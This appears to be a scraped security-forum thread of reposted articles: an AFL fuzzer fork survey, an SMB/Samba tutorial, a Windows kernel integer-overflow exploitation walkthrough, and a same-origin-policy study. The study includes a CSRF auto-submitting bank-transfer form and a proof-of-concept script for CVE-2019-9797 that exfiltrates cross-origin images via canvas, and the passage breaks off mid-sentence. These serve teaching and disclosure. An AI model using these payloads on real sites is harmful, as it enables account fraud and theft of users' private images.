baseband, there are certain drawbacks that you need to keep in mind: We have to localize the check of the control sum. Keep in mind that the state of the fuzzer is a state of memory that was saved in the memory dump, which can prevent the fuzzer from getting to certain paths. There's no sanitation of calls to dynamic memory, but it can be realized manually, and it will depend on RTOS (has to be researched). Intertask RTOS interaction is not emulated, which can also prevent finding certain paths. An example of working with this modification “afl-unicorn: Fuzzing Arbitrary Binary Code” and “afl-unicorn: Part 2 — Fuzzing the ‘Unfuzzable’”. Before we go on to the modifications based on the frameworks of dynamic binary instrumentation (DBI), let's not forget that the highest speed of these frameworks is shown by DynamoRIO, Dynlnst and, finally, PIN. PIN-based modifications aflpin — AFL with Intel PIN instrumentation. afl_pin_mode — another AFL instrumentation realized through Intel PIN. afl-pin — AFL with PINtool. NaFl — A clone (of the basic core) of AFL fuzzer. PinAFL — the author of this tool tried to port AFL to Windows for the fuzzing of already compiled binaries. Seems like it was done overnight just for fun; the project has never gone any further. The repository doesn't have sources, only compiled binaries and launch instruction. We don't know which version of AFL it's based on, and it only supports 32-bit applications. As you can see, there are many different modifications, but they are not very very useful in real life. Dyninst-based modifications afl-dyninst — American Fuzzy Lop + Dyninst == AFL balckbox fuzzing. The feature of this version is that first a researched program (without the source code) is instrumented statically (static binary instrumentation, static binary rewriting) with Duninst, and then is fuzzed with the classic AFL that thinks that the program is build with afl-gcc/afl-g++/afl-as As a result, it allows is to work with a very good productivity without the source code — It used to be at 0.25x speed compared to a native compile. It has a significant advantage compared to QEMU: it allows the instrumentation of dynamic linked libraries, while QEMU can only instrument the basic executable file statically linked with libraries. Unfortunately, now it's only relevant for Linux. For Windows support, changes to Dyninst itself are needed, which is being done. There's yet another fork with improved speed and certain features (the support of AARCH64 and PPC architectures). Modifications based on DynamoRIO drAFL — AFl + DynamoRIO – fuzzing without sources on Linux. afl-dr — another realization based on DynamoRIO which very well described on Habr. afl-dynamorio — a modification by vanhauser-thc. Here's what he says about it: «run AFL with DynamoRIO when normal afl-dyninst is crashing the binary and qemu mode -Q is not an option». It supports ARM and AARCH64. Regarding the productivity: DynamoRIO is about 10 times slower than Qemu, 25 times slower than dyninst, but about 10 times faster than Pintool. WinAFL — the most famous AFL fork Windows. (DynamoRIO, also syzygy mode). It was only a matter of time for this mod to appear because many wanted to try AFL on Windows and apply it to apps without sources. Currently, this tool is being actively improved, and regardless of a relatively outdated code base of AFL (2.43b when this article is written), it helped to find several vulnerabilities (CVE-2016-7212, CVE-2017-0073, CVE-2017-0190, CVE-2017-11816). The specialists from Google Zero Project team and MSRC Vulnerabilities and Mitigations Team are working in this project, so we can hope for the further development. Instead of compilation time instrumentation, the developers used dynamic instrumentation(based on DynamoRIO), which significantly slowed down the execution of the analyzed software, but the resulting overhead (doubled) is comparable to that of the classic AFL in binary mode. They also solved the problem of fast process launch, having called it persistent fuzzing mode; they choose the function to fuzz (by the offset inside the file or by the name of function present in the export table) and instrument it so that it could be called in the cycle, thus launching several input data samples without restarting the process. An articlecame out recently, describing how the authors found around 50 vulnerabilities in about 50 days using WinAFL. And shorty before it was published, Intel PT mode had been added to WinAFL; detalis can be found here. An advanced reader could notice that there are modifications with all the popular instrumentation frameworks except for Frida. The only mention of the use of Frida with AFL was found in «Chizpurfle: A Gray-Box Android Fuzzer for Vendor Service Customizations». A version of AFL with Frida is really useful because Frida supports several RISC architectures. Many researches are also looking forward to the release of DBI Scopio framework by the creator of Capstone, Unicorn, and Keystone. Based on this framework, the authors have already created a fuzzer (Darko) and, according to them, successfully use it to fuzz embedded devices. More on this can be found in «Digging Deep: Finding 0days in Embedded Systems with Code Coverage Guided Fuzzing». Modifications, based on processor hardware features When it comes to AFL modifications with the support of processor hardware features, first of all, it allows fuzzing kernel code, and secondly — it allows for much faster fuzzing of apps without the source code. And of course, speaking about processor hardware features, we are most of all interested in Intel PT (Processor Tracing). It is available from the 6th generation of processors onwards (approximately, since 2015). So, in order to be able to use the fuzzers listed below, you need a processor supporting Intel PT. WinAFL-IntelPT — a third-party WinAFL modification that uses Intel PT instead of DynamoRIO. kAFL — is an academic project aimed at solving the coverage-guided problem for the OS-independent fuzzing of the kernel. The problem is solving by using a hypervisor and Intel PT. More about it can be found in the white paper «kAFL: Hardware-Assisted Feedback Fuzzing for OS Kernels». Conclusion As you can see, the area of AFL modifications is actively evolving. Still, there is room for experiments and creative solutions; you can create a useful and interesting new modification. Thanks for reading us and good luck with fuzzing! Co-author: Nikita Knyzhov presler P.S. Thanks to the research center team, without whom this article would be impossible. Sursa: https://habr.com/ru/company/dsec/blog/449134/
-
Make Redirection Evil Again:URLParser Issues in OAuth XianboWang1, Wing CheongLau1, Ronghai Yang1,2, andShangchengShi11 The Chinese University of Hong Kong,2Sangfor Technologies Co., Ltd Download: https://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again-wp.pdf
-
Understanding the Movfuscator
Nytro replied to Nytro's topic in Reverse engineering & exploit development
Da, mov (dar si alte instructiuni) sunt Turing complete. -
Network Basics for Hackers: Server Message Block (SMB) and Samba March 4, 2019 | OTW Welcome back, my aspiring cyber warriors! This series is intended to provide the aspiring cyber warrior with all the information you need to function in cyber security from a network perspective, much like my "Linux Basics for Hackers" is for Linux. In this tutorial we will address Server Message Block or SMB. Although most people have heard the acronym, few really understand this key protocol. It may be the most impenetrable and least understood of the communication protocols, but so critical to the smooth functioning of your network and it's security. What is SMB? Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. It enables users and applications to share resources across their LAN. This means that if one system has a file that is needed by another system, SMB enables the user to share their files with other users. In addition, SMB can be used to share a printer over the Local Area Network (LAN). SMB over TCP/IP uses port 445. SMB is a client-server, request response protocol. The diagram below illustrates the request-response nature of this protocol. Clients connect to servers via TCP/IP or NetBIOS. Once the two have established a connection, the clients can send commands to access shares, read and write files and access printers. In general, SMB enables the client to do everything they normally do on their system, but over the network. SMB was first developed by IBM in the 1980's (the dominant computer company from the 1950's through the mid 1990's) and then adopted and adapted by Microsoft for its Windows operating system CIFS The term CIFS and SMB are often confused by the novice and cyber security professional alike. CIFS stands for “Common Internet File System.” CIFS is a dialect or a form of of SMB. That is, CIFS is a particular implementation of the Server Message Block protocol. It was developed by Microsoft to be used on early Microsoft operating systems. CIFS is now generally considered obsolete as it has been supplanted by more modern implementations of SMB including SMB 2.0 (introduced in 2006 with Windows Vista) and SMB 3.0 (introduced with Windows 8 and Server 2012). Vulnerabilities SMB in Windows and Samba in Linux/Unix systems (see below) has been major source of critical vulnerabilities on both these operating systems in the past and will likely will continue to be a source of critical vulnerabilities in the future. Two of the most critical Windows vulnerabilities over the last decade or so, have been SMB vulnerabilities. These include MS08-067 and more recently, the EternalBlue exploit developed by the NSA. In both cases, these exploits enabled the attacker to send specially crafted packets to SMB and execute remote code with system privileges on the target system. In other words, armed with these exploits, the attacker could take over any system and control everything on it. For a detailed look at the EternalBlue exploit against Windows 7 by Metasploit, see my tutorial here. In addition, using Metasploit, an attacker can set up a fake SMB server to capture credentials. In addition, the Linux/Unix implementation of SMB, Samba, has had its own problems as well. Although far from a complete list of vulnerabilities and exploits, when we search Metasploit 5 for smb exploits we find the considerable list below. Note the highlighted infamous MS08-067 exploit responsible for the compromising of millions of Windows Server 2003, Windows XP and earlier systems. Near the bottom of the list you can find the NSA's EternalBlue exploit (MS17-010) that the NSA used to compromise untold number of systems and then--after its release by Shadowbrokers--was used by such ransomware as Petya and WannaCry. In the Network Forensics section here at Hackers-Arise, I have detailed packet-level analysis of the EternalBlue exploit against SMB on a Windows 7 system. Samba While SMB was originally developed by IBM and then adopted by Microsoft, Samba was developed to mimick a Windows server on a Linux/UNIX system. This enables Linux/UNIX systems to share resources with Windows systems as if they were Windows systems. Sometimes the best way to understand a protocol or system is to simply to install and implement it yourself. Here, we will install, configure and implement Samba on a Linux system. As usual, I will be using Kali--which is built upon Debian-- for demonstration purposes, but this should work on any Debian system including Ubuntu and usually any of the vast variety of *NIX systems. Step #1: Download and Install Samba The first step, if not already installed, is to download and install Samba. It is in most repositories, so simply enter the command; kali > apt-get install samba Step #2: Start Samba Once Samba has been downloaded and installed we need to start Samba. Samba is a service in Linux and like any service, we can start it with the service command. kali > service smbd start Note that the service is not called "Samba" but rather smbd or smb daemon. Step #3: Configure Samba Like nearly every service or application in Linux, configuration can be done via simple text file. For Samba that text file is at /etc/samba/smb.conf. Let's open it with any text editor. kali > leafpad /etc/samba/smb.conf We can configure Samba on our system by simply adding the following lines to the end of our configuration file. In our example, we begin by; naming our share [HackersArise_share]; providing a comment to explain comment = Samba on Hackers-Arise; provide a path to our share path = /home/OTW/HackersArise_share; determine whether the share is read only read only = no; determine whether the share is browsable browsable = yes. Note that the share is in the user's home directory (/home/OTW/HackersArise_share) and we have the option to make the share "read only". Step #4: Creating a share Now that we have configured Samba, we need to create a share. A "share" is simply a directory and it's contents that we make available to other users and applications on the network. The first step is to create a directory using mkdir in the home directory of the user. In this case, we will create a directory for user OTW called HackersArise_share. kali > mkdir /home/OTW/HackersArise_share Once that directory has been created, we need to give every user access to it by changing its permissions with the chmod command. kali > chmod 777 /home/OTW/HackersArise_share Now, we need to restart Samba to capture the changes to our configuration file and our new share. kali > service smbd restart With the share created, from any Windows machine on the network you can access that share by simply navigating via the File Explorer to the share by entering the IP address and the name of the share, such as; \\192.168.1.101\HackersArise_share Conclusion SMB is a critical protocol on most computer systems for file, port, printer and named pipe sharing. It is little understood and little appreciated by most cyber security professionals, but it can be critical vulnerability on these systems as shown by MS08-067 and the NSA's EternalBlue. The better we understand these protocols, the better we protect our systems from attack and compromise. Sursa: https://www.hackers-arise.com/single-post/2019/03/04/Network-Basics-for-Hackers-Server-Message-Block-SMB
-
Windows Kernel Exploitation Part 3: Integer Overflow By Himanshu Khokhar On April 4, 2019 In Exploit Development, Integer Overflow, Kernel Exploitation, Reverse Engineering Introduction Welcome to the third part of Windows Kernel Exploitation series. In this part, we are going to exploit integer overflow in the HackSysExtremeVulnerableDriver. What exactly is an integer overflow? For those who do not know about integer overflows, you might be thinking how an integer can overflow? Well, the actual integer does not overflow. CPU stores integers in fixed size memory allocations (we are not talking about heap or alike here). If you are familiar with C/C++ programming language or similar languages, you might recall data types and how each data type has specific fixed size. On most machines and OSes, char is 1 byte and int is 4 bytes long. What that means is a char data type can hold values that are 8-bits in size, ranging from 0 to 255 or in case of signed values, -128 to 127. Same goes for integers, on machines where int is 4-bytes in size, it can hold values from 0 to 232 – 1 (in case of unsigned values). Now, let us consider we are using an unsigned int whose largest value can be 232 – 1 or 0xFFFFFFFF. What happens when you add 1 to this? Since all the 32 bits are set to one, adding one will make it a 33-bit value but since the storage can hold only 32 bits, those 32 bits are set to 0. When doing operations, CPU generally loads the number in a 32-bit register (talking about x86 here) and adding 1 will set Carry Flag and the register holds value 0 as all 32 bits are now 0. Now, if there is a size check whether the value is greater than, let’s say 10, then the check will fail but if the size restriction was not there, then the comparison operation would return true. To understand it in more detail, let us have a look the vulnerability and see how we can exploit integer overflow issue in HEVD to gain code execution in Windows Kernel. Vulnerability Now we have got it cleared, let us have a look at the vulnerable code (function TriggerIntegerOverflow located in IntegerOverflow.c). Initially, the function creates an array of ULONGs which can hold 512 member elements (BufferSize is set to 512 in common.h header file). Vulnerable function in IntegerOverflow.c The kernel then checks if the buffer resides in user land and then it prints some information for us. Pretty helpful. Once that has been done, the kernel then checks whether the size of the data (along with the size of Terminator, which is 4 bytes) is more than that of KernelBuffer. If it is, then it exits without copying the user-land buffer in kernel-land buffer. Size checks But, if that is not the case, then it goes ahead, and copies data to the kernel buffer. Another thing to note here is that IF it encounters BufferTerminator in the user-land buffer, it stops copying and moves ahead. So, we need to put the BufferTerminator at the end of our user mode buffer. Copying user-mode data to kernel-mode function stack The Overflow The problem in Line 100 of IntegerOverflow.c is that if we supply the size parameter as 0xFFFFFFFC and then it adds the size of BufferTerminator (which is 4 bytes), the effective size becomes – 0xFFFFFFFC + 4 = 0x00000000 which is less than the size of KernelBuffer and therefore, we pass the check of the data size and move to copying of the buffer to kernel mode. Verifying the bug Now, to verify this, we are going to send our buffer to the HEVD but passing 0xFFFFFFFC as the size of the buffer. For now, we will not place a huge buffer and crash the kernel, rather we will just send a small buffer and confirm. PoC of triggering Integer Overflow Since we know the buffer is of 512 ULONGs, we will just send this data and see what the kernel does. Note: Here, the focus is on the 4th parameter of DeviceIoControl rather than on the actual data. Finally, send this buffer to HEVD and see what happens. Successfully triggered Integer Overflow As you can see in the picture, the UserBuffer Size says 0xFFFFFFFC, but we still managed to bypass the size validity check and triggered integer overflow. We confirmed that by putting 0xFFFFFFFC, we can bypass the check size, now all it remains is to put a pattern (a unique pattern) after the UserBuffer and put the terminator after that to find saved return pointer overwrite. If you do not know how to do that, please read Part 1 of this series where I have shown how to do this. Let us move ahead and exploit it. Exploiting the Overflow All now remains is to use overwrite the saved return address with the TokenStealingPayloadWin7 shellcode provided in HEVD and you are done. Note: You may need to modify the shellcode a bit to save it from crashing. This is your homework. Getting the shell Let us first verify whether I am a regular user or not. Regular User As it can be seen, I am just a regular user. After we run our exploit, I become nt authority/system. Successful exploitation of Integer Overflow That’s for this this part folks, see you in next part. You can find whole code in my code repo here. References HackSysTeam FuzzySecurity Sursa: https://pwnrip.com/windows-kernel-exploitation-part-3-integer-overflow/
-
Same-Origin Policy: From birth until today In this blog post I will talk about Cross-Origin Resource Sharing (CORS) between sites on different domains, and how the web browser’s Same Origin Policy is meant to facilitate CORS in a safe way. I will present data on cross-origin behaviour of various versions of four major browsers, dating back to 2004. I will also talk about recent security bugs (CVE-2018-18511 and CVE-2019-9797) I discovered in the latest versions of Firefox, Chrome and Opera which allows stealing sensitive images via Cross-Site Request Forgery (CSRF). Overview Motivation An attack… … and the defence What is CORS, SOP, preflight checks and all this jibberish you’re talking about? CORS headers Why GET should be “safe” SOP behaviour across browsers Browsers tested Test setup Server CORS modes Cross-origin request methods Requested targets Results Implications Tools used References Motivation An attack… Cross-Site Request Forgery (CSRF or XSRF) is arguably one of the most common issues we encounter during web app testing, and one of the trickiest to protect against. The attack goes as follows: A malicious user, Eve, has an account with bank.example with account number Eve wants to steal money from another customer, Bob, and knows that the HTTP request Bob would send to bank.example to transfer $10000 to Eve is as follows: POST /transfer.php HTTP/1.1 Host: bank.example Cookie: PHPSESSID={Bob's secret session cookie} fromAcc=primary&toAcc=123456&amount=10000 Figure 1: An HTTP request vulnerable to CSRF So she sets up a page at https://evil-eve.example/how-to-delete-yourself-from-the-internet with the following contents: <!DOCTYPE html> <html> <head> <script> document.addEventListener("DOMContentLoaded", function() { document.getElementById("gimmeTheMoney").submit(); }); </script> </head> <body> <form id="gimmeTheMoney" method="POST" action="https://bank.example/transfer.php"> <input type="hidden" name="fromAcc" value="primary"> <input type="hidden" name="toAcc" value="123456"> <input type="hidden" name="amount" value="10000"> </form> </body> </html> Figure 2: An HTML page which submits the request in Figure 1 The HTML form on the page corresponds to the POST request shown above. When Bob visits Eve’s page, in the hope of erasing past mistakes, the form is automatically submitted and includes Bob’s PHPSESSID cookie (if he has logged in to the bank’s website recently), performing the money transfer. … and the defence There are a few ways websites can protect their users from this type of attack. This article is not meant to explain all of them in detail; OWASP’s cheatsheet does a good job at that, albeit on a technical level. In short, there are two main techniques websites can use to counter CSRF: Relying on the browser... ...and its Same Origin Policy (SOP); this is the scenario I investigate in this article ...by setting cookies with the SameSite flag Using dynamic pages and generating one-time tokens for each action on the page, every time the page is reloaded. Option 1.1 only works if the application refuses to accept requests that are sent via HTML forms (i.e. requests with content type application/x-www-form-urlencoded, multipart/form-data or text/plain, and no non-standard HTTP headers). This is because the same origin policy only applies to actions taken by JavaScript (and other browser-scripting languages). It does not apply to old-school HTML forms, so browsers can’t do anything to block HTML form submissions from untrusted domains. Requests containing JSON data or non-standard headers (e.g. X-Requested-With) on the other hand can only be sent via JavaScript. The browser needs to send a so-called “pre-flight check”, and unless the check determines that the target domain (e.g. bank.example) explicitly allows such requests from the origin domain (e.g. evil-eve.example), the browser doesn’t send the actual request. bank.example needs to respond with appropriate HTTP headers for the same origin policy to be effective; see section CORS headers. Option 1.2 will prevent attacks like the one described, but it is supported only in modern browsers. Furthermore it will not prevent unauthenticated CSRF attacks to websites which are on an internal network or rely on IP whitelisting for authorization. The method relies on the legitimate server (bank.example) instructing the browser to only include the session cookie if the request is coming from the same origin, i.e. https://bank.example. The browser respects this during HTML form submissions too. This way, money transfers on bank.example work correctly, but the form hosted on evil-eve.example will not include Bob’s session cookie when submitted, and hence will prevent the transfer from occurring. Option 2 can be used to prevent CSRF attacks that rely on any HTTP method and submission type (GET or POST; HTML forms or JavaScript), but has many pitfalls: care needs to be taken to issue, require and validate the token for every request; the server still needs to implement an appropriate CORS policy to prevent malicious sites from learning the token; the token needs to be generated in a cryptographically secure random way, be long enough, short-lived and tied to the current user’s session (i.e. invalidated upon Log out). What is CORS, SOP, preflight checks and all this jibberish you’re talking about? An origin is defined by a schema (or protocol), hostname and port number, e.g. https://bank.example:443. The standard says two origins are considered the same if and only if all of the below conditions are met: the protocol for both origins is the same, e.g. https the hostname for both origins is the same, e.g. bank.example; the hostname can be only partially-qualified (e.g. localhost); it can also be an IP address 1 the port number for both origins is the same; the port number does not have to be explicitly given, i.e. https://bank.example:443 and https://bank.example are the same origin since 443 is the default port number for https Requests sent from one origin to a different one are called cross-origin requests. Historically browsers flat out refused to allow JavaScript to make cross-origin requests. This was done for security reasons, namely to prevent CSRF. As web applications became more complicated and interconnected the need for JavaScript-initiated cross-origin requests became evident. To enable cross-origin requests in a secure manner the standard for Cross-Origin Resource Sharing (CORS) was introduced. CORS says that when making cross-origin requests browsers must include the Origin header and not include cookies unless explicitly requested, for example if the request had set XMLHttpRequest.withCredentials to true. Additionally, CORS defines the concept of a simple request. A request is simple if all of these are true: the method is GET, HEAD or POST the request does not include non-standard headers it submits content of type application/x-www-form-urlencoded, multipart/form-data or text/plain (those that can be submitted via HTML forms) If the request is simple, the browser can send the request to the external origin, but if the server’s CORS policy does not allow the request the browser must not allow JavaScript to read the response. If the request is not simple, the browser must do a preflight check (OPTIONS HTTP method) with appropriate CORS headers. If the server’s CORS policy does not explicitly allow the request, then it must refuse to send the actual request. Servers receiving cross-origin requests must respond with appropriate CORS headers indicating whether the request is allowed; this is done irrespective of whether the request is a preflight check (OPTIONS) or the actual request (e.g. GET). CORS headers If no preflight check is done browsers are only required to send the Origin header. Otherwise the preflight check should have an empty body, include no cookies, and include the Access-Control-Request-Method header with the method of the request to be made, e.g. GET. Additionally, if non-standard headers are to be included, it must include these as a comma-separated list in the Access-Control-Request-Headers header. Servers should respond to a cross-origin request with the following headers: Access-Control-Allow-Origin: either a single allowed origin or a wildcard (*) indicating all origins; servers may change the value depending on the Origin of the request Access-Control-Allow-Credentials: indicating if the browser is allowed to send cookies with the request; if omitted, defaults to false; cannot be true if Access-Control-Allow-Origin is * Access-Control-Allow-Headers: comma-separated list of allowed headers A picture table says a thousand words: Request is simple Server allows Browsers must Origin Credentials Do preflight Give JavaScript access Yes {not as requested} No No No Yes * No Yes, if no cookies needed Yes {as requested} No Yes Yes No {not as requested} No Yes No Yes * No Yes, if no cookies needed Yes {as requested} No Yes Yes Table 1: The CORS standard Why GET should be “safe” The preflight checks by browsers and their SOP make sure that requests which may modify sensitive data, such as DELETE, PUT, PATCH and non-simple POST requests will never be sent to the server from a third-party domain, unless the server explicitly allows such a request from this particular third-party domain. You may then wonder why browsers don’t apply the same rules to GET requests. After all, some servers implement, or at least allow, sensitive data operations using GET requests. Take this hypothetical example: a Like button on a social media site (let’s call it FakeBook) which is placed under a page and links to https://fakebook.example/like?page=HTTPSEverywhere . When a user clicks on the button in order to like the page, the browser will send a GET request to that URL, and will include the user’s session cookie, so that the server knows which user has liked this page. This is a classic CSRF which the browser can’t do anything about. Bob, who is logged in to his FakeBook account, goes to windywellington.example to check the weather. windywellington.example is actually a malicious site which wants to collect likes on FakeBook and redirects Bob back to https://fakebook.example/like?page=WindyWellington. As far as the browser is concerned there is nothing wrong with that, as there are many legitimate cases which use redirection to third-party domains. And as far as fakebook.example is concerned Bob may have clicked that Like button himself. Blocking external Referer or using tokens won’t work if Like buttons are to be integrated with other sites. So what could SOP do about GET requests? Pretty much nothing. Browsers are not supposed to block redirects by default. And there are many other ways windywellington.example can trick the browser into requesting a resource from fakebook.example, not limited to: embedding https://fakebook.example/like?page=WindyWellington in an iframe 2 loading it as a script, image or any other resource using an HTML form with the GET method In none of those cases can either the browser or fakebook.example detect the malicious intent. This is why the HTTP standard clearly states that GET requests should always be “safe”, i.e. never change web application data. And this is also the reason why browsers are not required to submit a preflight check for GET requests. Unfortunately many websites neglect this and fall victim to CSRF attacks like the hypothetical Like button scenario. (note: facebook.com is not vulnerable in this way). SOP behaviour across browsers Browsers tested I tested 17 versions of Opera, 16 versions of Firefox, 40 versions of Chrome, 39 versions of Internet Explorer, and one version of Microsoft Edge. A total of 113 browsers, dating back to 2004. All browsers were tested using their default settings. Full list of browsers tested and sources used I tested one version per year as far back as it supports : Versions and versions can be downloaded from the official Opera archives. Versions pre 11.00 can be found on the third-party site . I do not take responsibility for any loss as a result of installing software from unofficial sources. I ran the versions in question on a virtual machine. I tested roughly one version per year (except version 1.5 from 2005, due to technical issues running the binary) as far back as version 1.0: All versions of Firefox can be downloaded from the . I used the ready Windows builds from Chromium's and builds archive. I did not test stable releases in particular, as the build archives do not indicate which version a build corresponds to. I instead selected one out of roughly every 2000 builds, from the oldest to the newest. The date shown below is approximate as it corresponds to the release date of the corresponding stable major version: I wrote a which can fetch a list of all builds for a platform (e.g. ) or download the portable version of a given build (e.g. ). I tested every major version of Internet Explorer as far back as it supports . IE11 on Windows 10 behaves differently to IE11 on older Windows versions, even with the latest patches applied to them. I tested three versions of IE11 on Windows 10, one on Windows 7, and all 31 versions of IE11 on Windows 8.1 (initial + ) Virtual machines for various platforms, including VMware Fusion, with IE versions 8 to 11 can be downloaded from . Virtual machines for Microsoft Hyper-V can be downloaded from . These can be imported into VirtualBox as well, and from there exported to OVF format for VMware. I tested only one recent version of Microsoft Edge: A virtual machine for various platforms, including VMware Fusion, with the above Edge version can be downloaded from . Test setup I wrote an HTTP server based on Python’s http.server, and some supporting HTML/JavaScript. The server implements a dummy login and requires a cookie issued by it for requests to any file under /secret/. The CORS headers to be included in the server’s response to each request are taken from URL parameters in that request. Supported parameters: creds: should be 0 or 1 requesting Access-Control-Allow-Credentials: true or false origin: specifies Access-Control-Allow-Origin; it is taken literally unless it is {ECHO}, then it is taken from the Origin header in the request. /demos/sop/getSecret.html will prompt for the target origin (should be different to the one it’s loaded from), then log in to it, and fetch https://<target_host>/secret/<secret file>?origin=...&creds=... requesting each one of the five CORS combinations described below; and it will do so using each the eight cross-origin request methods described below. Server CORS modes Each request was submitted 5 times: each time the server was configured to reply with one of the five Access-Control-Allow-* header combinations: Origin Credentials No * No Yes {as requested} No Yes Table 2: The combinations of CORS server response headers tested where “{as requested}” means the server specifically allowed the origin the request came from, “Yes” indicates true value of the header, “No”—false Cross-origin request methods Each browser was tested with the following 8 cross-origin request methods: Method Body Content-Type or embedded as Request is simple Require cookies? Response data taken from GET via XHR — Yes Yes responseText POST via XHR application/json No Yes responseText Sample code for XMLHttpRequest GET via iFrame3 N/A Yes No contentDocument.body.innerHTML Sample code for iframe GET via object3 text/plain Yes No contentDocument.body.innerHTML Sample code for object GET via 2D canvas N/A Yes Yes toDataURL() No Sample code for 2D canvas GET via bitmap canvas N/A Yes Yes toDataURL() No Sample code for bitmap canvas Table 3: The cross-origin request and data exfiltration methods tested Requested targets Where the request method used a canvas the “secret” file was an image. Otherwise the file was a plain text file. Each test was done twice: once to an origin with a different hostname (IP address of a different interface on the same machine), and once to an origin with the same hostname/IP address but different port number. This makes for a total of 8 × 5 × 2 = 80 tests per browser. Results Below is a summary of those browsers which send the request and/or allow JavaScript to read the response when they shouldn’t. For the full list of every request, see the current result tables for cross-origin requests to different hostnames and same hostnames/different ports. When target origin differs by hostname When the target origin had a different hostname, most browsers were either compliant, or forbid the request, which is the safe fallback if CORS is not supported. A notable exception are the currently latest versions of Chrome, Firefox and Opera, which allow JavaScript to read so-called “tainted” canvases. These are canvases rendered from an image which has not been loaded for cross-origin use, i.e. no crossorigin attribute was given. I discovered the bug (CVE-2018-18511) while doing this research and reported it to Google and Mozilla. In addition, a few very old versions of Chrome do not apply the CORS policy to XMLHttpRequests. (In this and in any following tables, the highlighted cells indicate behaviour that does not conform to the specification). Browsers Methods Server allowed Browser did Origin Credentials Preflight for POST Give JavaScript access Chrome 67.0 Chrome 69.0 Chrome 71.0 Chrome 72.0 Chrome 74.0 Firefox 65.0 Opera 56.0 GET via bitmap canvas (no CORS) No No Yes * No Yes {as requested} No Yes Yes Chrome 2.0.165.0 GET via XHR POST via XHR No No No * No Yes Yes {as requested} No Yes Yes Chrome 2.0.173.0 GET via XHR POST via XHR No Yes No * No Yes Yes {as requested} No Yes Yes Table 4: Browsers with dangerous SOP policy for origins differing by hostname When target origin differs only by port number In addition to the vulnerable browsers listed in Table 4, when the target origin differed only in port number, all versions of Internet Explorer and Edge including the latest ones, had an unsafe SOP policy. Interestingly, Edge allows exporting of tainted bitmap canvases only in this case, when the origins are on the same host. Browsers Methods Server allowed Browser did Origin Credentials Preflight for POST Give JavaScript access Internet Explorer 11 (<= Windows 8.1) Internet Explorer 10 Internet Explorer 9 Internet Explorer 8 Opera 9.00 GET via XHR POST via XHR No No Yes * No Yes {as requested} No Yes Yes Chrome 2.0.165.0 GET via XHR POST via XHR No No No * No Yes Yes {as requested} No Yes Yes Chrome 2.0.173.0 GET via XHR POST via XHR No Yes No * No Yes Yes {as requested} No Yes Yes Microsoft Edge 42 Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 Internet Explorer 8 Internet Explorer 7 GET via iFrame No No Yes * No Yes {as requested} No Yes Yes Microsoft Edge 42 Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 GET via object No No Yes * No Yes {as requested} No Yes Yes Chrome 67.0 Chrome 69.0 Chrome 71.0 Chrome 72.0 Chrome 74.0 Firefox 65.0 Opera 56.0 Microsoft Edge 42 Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 Opera 9.60 Opera 9.20 Opera 9.00 GET via bitmap canvas (no CORS) No No Yes * No Yes {as requested} No Yes Yes Internet Explorer 11 Internet Explorer 10 Internet Explorer 9 Opera 9.60 Opera 9.20 Opera 9.00 GET via 2D canvas (CORS) No No Yes * No Yes {as requested} No Yes Yes Table 5: Browsers with dangerous SOP policy for origins differing by port number only Implications There are two main issues to discuss here. Issue 1: Exporting of tainted canvases Sometime in 2018 a bug was introduced in Chrome, Firefox as well as Opera, which allowed rendering any image to a bitmap canvas and exporting it. This is a serious issue since the browser sends the cookies it has for a domain when loading images from that domain. For example, if a user, while logged in to their account at bank.example, visits an attacker’s page, the page can steal any sensitive images the user has access to. All the attacker needs is the URL of the image. The image can be anything—from a personal photo or a scanned document, to the QR code for a two factor-authentication secret. It is an example of cross-site request forgery where it was up to the browser, and not the server, to prevent it. Google didn’t make fixing the issue a priority as it was not exploitable due to another bug in Chrome: toDataURL() and toBlob() give a generic transparent image for bitmap canvases. They did eventually fix it, and subsequently the other bug, which was giving a transparent image for a bitmap context. Mozilla fixed the bug within days and pushed an update. Days after that I discovered an alternative way (CVE-2019-9797) of getting the image: again by converting it to an ImageBitmap, but then rendering it in a 2D canvas instead of a bitmap canvas: <html><body> <script charset="utf-8"> function getData() { createImageBitmap(this, 0, 0, this.naturalWidth, this.naturalHeight).then(function(bmap) { var can = document.createElement('canvas'); // mfsa2019-04 fixed this // -------------------------- // var ctx = can.getContext('bitmaprenderer'); // ctx.transferFromImageBitmap(bmap); // -------------------------- // but not this var ctx = can.getContext('2d'); ctx.drawImage(bmap, 0, 0); document.getElementById('result').textContent = can.toDataURL(); var img = document.getElementById('result_render'); img.src = can.toDataURL(); document.body.appendChild(img); }); } </script> <img style="visibility: hidden" src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/> <br/><textarea readonly style="width:100%;height:10em" id="result"></textarea> <br/>Re-rendered image: <br/><img id="result_render"></textarea> </body></html> Mozilla were again quick to fix it. The fix made it into the stable branch on April 1st. Chrome is not vulnerable to this version of the exploit. Issue 2: IE and Edge’s same-origin policy when it comes to origins on the same host It is clear that Internet Explorer and Edge do not consider origins on the same host but different ports distinct, at least not as distinct as origins with different hostnames. This is not a new issue, or an accidental neglect by Microsoft. The Mozilla Developer Guide is quite clear on the fact that: Internet Explorer has two major exceptions to the same-origin policy: Trust Zones: If both domains are in the highly trusted zone (e.g. corporate intranet domains), then the same-origin limitations are not applied. Port: IE doesn’t include port into same-origin checks. Therefore, https://company.com:81/index.html and https://company.com/index.html are considered the same origin and no restrictions are applied. It also clearly points out that: These exceptions are nonstandard and unsupported in any other browser. The behaviour of modern Internet Explorer and Edge is striking for several reasons: The changes introduced for Windows 10 do improve the security of IE, but have been applied inconsistently and insufficiently: They are not available for older Windows versions, even though security updates are still being issued for them. They close the loophole in XMLHttpRequest, but still allow cross-origin access via iframe; data from another origin can also be stolen using object. It clearly violates the standard which has been set long ago, and which all other browsers conform to, and conform to for a good reason. I do not know the reasoning behind their same origin policy, but the implications are not negligible. We often see multiple HTTP services on the same host. Usually one is a standard public site (on ports 80 and 443), another one may be an administrative interface, not accessible publicly. Treating these as a single origin exposes every service on the host to attacks should even one of them be compromised. Consider a hypothetical example: a simple public website, which holds no sensitive data, nor implements authentication. It is likely that not a lot of attention would be paid to its secure implementation as it does not appear to be a valuable target for attackers. Let’s say a page on the site, /vulnerable.html, is vulnerable to a reflected Cross-Site Scripting (XSS) attack. An attacker can trick the developer of the site 